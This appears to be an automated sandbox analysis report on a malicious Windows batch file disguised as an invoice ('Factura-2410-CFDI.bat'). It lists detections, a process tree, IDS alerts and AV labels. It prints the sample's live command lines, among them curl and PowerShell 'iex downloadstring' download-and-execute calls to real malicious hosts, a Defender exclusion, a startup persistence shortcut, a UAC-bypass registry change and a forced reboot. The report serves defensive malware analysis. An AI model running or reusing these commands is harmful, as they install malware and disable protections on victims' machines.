Windows Analysis Report
Factura-2410-CFDI.bat

Overview

General Information

Sample name: Factura-2410-CFDI.bat
Analysis ID: 1542952
MD5: 2cba1f2ecba7411565c62f74f8ff095c
SHA1: e69a4fccd578e235fa31c3edc9d8b4a6974faeb0
SHA256: 1a17e8bd86fbe8d1fb1aedce6182de434a3a8e71488f6d285651c168d03242eb

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
UAC bypass detected (Fodhelper)
Yara detected Powershell download and execute
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Uses shutdown.exe to shutdown or reboot the system
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 620 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • curl.exe (PID: 6132 cmdline: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • powershell.exe (PID: 6872 cmdline: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • _kjfech8_Vi7.exe (PID: 1492 cmdline: "C:\_kjfech8_V\_kjfech8_Vi7.exe" MD5: 4AFCAB972E98ECBF855F915B2739F508)
        • conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 4484 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • WerFault.exe (PID: 7488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184 MD5: 40A149513D721F096DDF50C04DA2F01F)
      • shutdown.exe (PID: 4876 cmdline: "C:\Windows\system32\shutdown.exe" /r /t 10 MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
    • powershell.exe (PID: 8092 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 1688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6500 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7380 cmdline: powershell.exe -nop -win 1 - MD5: 04029E121A0CFA5991749937DD22A1D9)
  • _kjfech8_Vi7.exe (PID: 3204 cmdline: "C:\_kjfech8_V\_kjfech8_Vi7.exe" MD5: 4AFCAB972E98ECBF855F915B2739F508)
    • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\Public\Documents\vs1.ps1 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Source | Rule | Description | Author | Strings
Process Memory Space: curl.exe PID: 6132 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 6872 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 6872 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Source | Rule | Description | Author | Strings
amsi64_6872.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_6872.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
amsi64_7380.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7380.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

            System Summary

            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe
            Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\_kjfech8_V\_kjfech8_Vi7.exe" , ParentImage: C:\_kjfech8_V\_kjfech8_Vi7.exe, ParentProcessId: 1492, ParentProcessName: _kjfech8_Vi7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V", ProcessId: 6104, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\users\public\computer_kjfech8_V.cmd
            Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\users\public\computer_kjfech8_V.cmd
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\shutdown.exe" /r /t 10, CommandLine: "C:\Windows\system32\shutdown.exe" /r /t 10, CommandLine|base64offset|contains: , Image: C:\Windows\System32\shutdown.exe, NewProcessName: C:\Windows\System32\shutdown.exe, OriginalFileName: C:\Windows\System32\shutdown.exe, ParentCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\shutdown.exe" /r /t 10, ProcessId: 4876, ProcessName: shutdown.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" , CommandLine: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" , CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" , ProcessId: 6132, ProcessName: curl.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1", ProcessId: 6872, ProcessName: powershell.exe

            Data Obfuscation

            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1688, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') ", ProcessId: 6500, ProcessName: cmd.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-10-27T00:21:58.065441+0200 | 2052642 | 1 | A Network Trojan was detected | 93.127.200.211 | 443 | 192.168.11.20 | 49752 | TCP
            2024-10-27T00:21:58.065441+0200 | 2834717 | 1 | A Network Trojan was detected | 93.127.200.211 | 443 | 192.168.11.20 | 49752 | TCP
            2024-10-27T00:21:47.576164+0200 | 2841717 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49750 | 62.72.3.210 | 80 | TCP

            AV Detection

            Source: C:\Users\Public\computer_kjfech8_V.cmd, Avira: detection malicious, Label: BAT/Runner.VPF
            Source: C:\Users\Public\computer_kjfech8_Vy.cmd, Avira: detection malicious, Label: BAT/Runner.VPF
            Source: C:\Users\Public\Documents\vs1.ps1, Avira: detection malicious, Label: TR/PShell.Dldr.VPJ
            Source: C:\_kjfech8_V\jli.dll, ReversingLabs: Detection: 18%

            Privilege Escalation

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Registry value created: DelegateExecute
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Registry value created: NULL C:\_kjfech8_V\_kjfech8_Vi7.exe
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exe, File opened: C:\_kjfech8_V\MSVCR100.dll
            Source: unknown, HTTPS traffic detected: 93.127.200.211:443 -> 192.168.11.20:49752 version: TLS 1.2
            Source: Binary string: msvcr100.i386.pdb source: _kjfech8_Vi7.exe, _kjfech8_Vi7.exe, 0000000B.00000002.29808351670.000000006FD71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u92\6642\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: _kjfech8_Vi7.exe, 00000009.00000000.29777323121.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000000.29782413626.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29804465764.0000000000D02000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C51760000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000014.00000002.30390098625.0000014C517D6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,9_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF40B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,11_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,11_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,11_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,11_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF8B5
